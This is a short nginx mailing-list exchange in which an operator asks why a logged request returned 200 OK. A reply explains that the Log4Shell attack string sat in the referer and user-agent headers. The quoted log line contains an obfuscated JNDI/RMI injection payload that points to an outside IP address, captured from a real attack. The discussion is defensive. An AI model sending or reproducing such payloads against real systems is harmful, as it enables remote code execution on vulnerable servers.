200 html return to log4j exploit

Jay Caines-Gooby jay at gooby.org
Mon Dec 20 17:49:48 UTC 2021


The request is for your index page "GET / HTTP/1.1"; that's why your server
responded with 200 OK. The special characters are in the referer and
user-agent fields, as a log4j system would also try to interpolate these,
and thus be vulnerable to the exploit.

On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com <lists at lazygranch.com>
wrote:

> I don't have any service using java so I don't believe I am subject to
> this exploit. However I am confused why it returned a 200 for this
> request. The special characters in the URL are confusing.
>
> 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"
>
>     log_format  main  '$status $remote_addr - $remote_user
>     [$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
>                       '"$http_user_agent" "$http_x_forwarded_for"';
>
> That is my log format from the nginx.conf.
>
> I now have a map to catch "jndi" in both url and agent. So far so good
> not that it matters much. I just like to gather IP addresses from
> hackers and block their host if it lacks eyeballs,
> _______________________________________________
> nginx mailing list
> nginx at nginx.org
> http://mailman.nginx.org/mailman/listinfo/nginx
>


-- 
Jay Caines-Gooby
http://jay.gooby.org
jay at gooby.org
+44 (0)7956 182625
twitter, skype & aim: jaygooby
gtalk: jaygooby at gmail.com